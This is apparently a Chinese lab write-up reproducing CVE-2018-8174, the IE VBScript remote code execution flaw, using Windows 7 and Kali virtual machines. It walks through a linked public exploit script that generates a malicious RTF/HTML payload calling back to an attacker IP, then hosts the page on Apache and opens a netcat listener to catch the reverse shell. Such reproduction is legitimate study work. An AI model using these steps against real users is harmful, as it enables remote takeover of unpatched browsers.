CVE-2018-8174漏洞复现

漏洞介绍

“CVE-2018-8174这个漏洞是针对IE浏览器的一个远程代码执行漏洞,是Windows VBScript Engine 代码执行漏洞,由于VBScript脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码。

复现环境

windows7
kali

漏洞复现

0X01:下载CVE-2018-8174文件

下载:https://github.com/Yt1g3r/CVE-2018-8174_EXP
注意:kali无法直接下载可以先下载到本地再拷贝到kali虚拟机
CVE-2018-8174漏洞复现_第1张图片0X02:在CVE-2018-8174文件夹中生产Payload

命令:python CVE-2018-8174.py -u http://192.168.199.221/exploit.html -o msf.rtf -i 192.168.199.221 -p 9999
格式:python CVE-2018-8174.py -u 生产的Payload -o msf.rtf -i IP地址 -p 监听端口

CVE-2018-8174漏洞复现_第2张图片会生成两个文档
CVE-2018-8174漏洞复现_第3张图片

0X03:将exploit.html拷贝到/var/www/html/目录下

命令:cp exploit.html /var/www/html 

CVE-2018-8174漏洞复现_第4张图片

0X04:重启apache

命令:service apache2 start

在这里插入图片描述

0X05:开启监听端口

命令:nc -lvnp 9999

在这里插入图片描述

0X06:win7使用IE访问

打开win7虚拟机,使用IE访问http://192.168.199.221/exploit.html
CVE-2018-8174漏洞复现_第5张图片

0X07:kali验证

查看kali终端,可以看到反弹shell成功,可以执行命令
CVE-2018-8174漏洞复现_第6张图片

~集中起来的意志,可以击穿顽石。

你可能感兴趣的:(#,漏洞复现,安全,linux,windows)